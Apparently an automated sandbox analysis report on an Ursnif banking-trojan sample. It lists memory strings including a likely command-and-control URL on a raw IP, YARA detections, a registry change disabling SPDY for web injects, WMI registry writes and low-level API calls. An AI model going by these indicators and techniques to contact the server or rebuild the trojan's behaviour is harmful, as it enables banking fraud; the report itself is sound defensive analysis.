Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: msapplication.xml1.4.dr	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: msapplication.xml2.4.dr	String found in binary or memory: http://www.live.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: msapplication.xml3.4.dr	String found in binary or memory: http://www.nytimes.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: msapplication.xml4.4.dr	String found in binary or memory: http://www.reddit.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: msapplication.xml5.4.dr	String found in binary or memory: http://www.twitter.com/
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: msapplication.xml6.4.dr	String found in binary or memory: http://www.wikipedia.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: msapplication.xml7.4.dr	String found in binary or memory: http://www.youtube.com/
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: explorer.exe, 00000025.00000002.647622896.00000000053C4000.00000004.00000001.sdmp	String found in binary or memory: https://185.156.172.54/images/TMwZ54mn/_2B0YUdRavAKwwypVOfrYnt/6W6xbFFdug/RuY3cr5ZWBeuRUS61/qsMNDxm8
Source: powershell.exe, 0000001C.00000002.495468052.00000224A0A41000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001C.00000002.495468052.00000224A0A41000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001C.00000002.495468052.00000224A0A41000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001C.00000002.477701499.0000022490BF0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001C.00000002.495468052.00000224A0A41000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: 5fd9d7ec9e7aetar.dll	String found in binary or memory: https://sectigo.com/CPS0D

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.239593873.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.239746568.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.239727168.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.381854498.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.456980641.0000000001240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.239703401.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.445671426.0000026AEDB20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.239555043.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.641874278.0000000003B86000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.438096785.0000000001270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.239627007.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.239757278.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.239668974.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6620, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 5508, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 5128, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_100181C0 EntryPoint,DestroyCursor,CreateMetaFileA,CloseFigure,AbortPath,DestroyCursor,GetMapMode,CharUpperW,OpenIcon,CharNextA,GdiGetBatchLimit,GetClipboardOwner,IsGUIThread,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,

0_2_100181C0

Source: loaddll32.exe, 00000000.00000002.457120886.000000000153B000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.239593873.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.239746568.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.239727168.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.381854498.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.456980641.0000000001240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.239703401.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.445671426.0000026AEDB20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.239555043.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.641874278.0000000003B86000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.438096785.0000000001270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.239627007.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.239757278.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.239668974.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6620, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 5508, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 5128, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY

Disables SPDY (HTTP compression, likely to perform web injects)

Show sources

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01511ADC GetLastError,NtClose,	0_2_01511ADC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01511A34 GetProcAddress,NtCreateSection,memset,	0_2_01511A34
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_015110BA NtMapViewOfSection,	0_2_015110BA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_015123F5 NtQueryVirtualMemory,	0_2_015123F5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02F679B3 NtMapViewOfSection,	0_2_02F679B3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02F671B9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	0_2_02F671B9
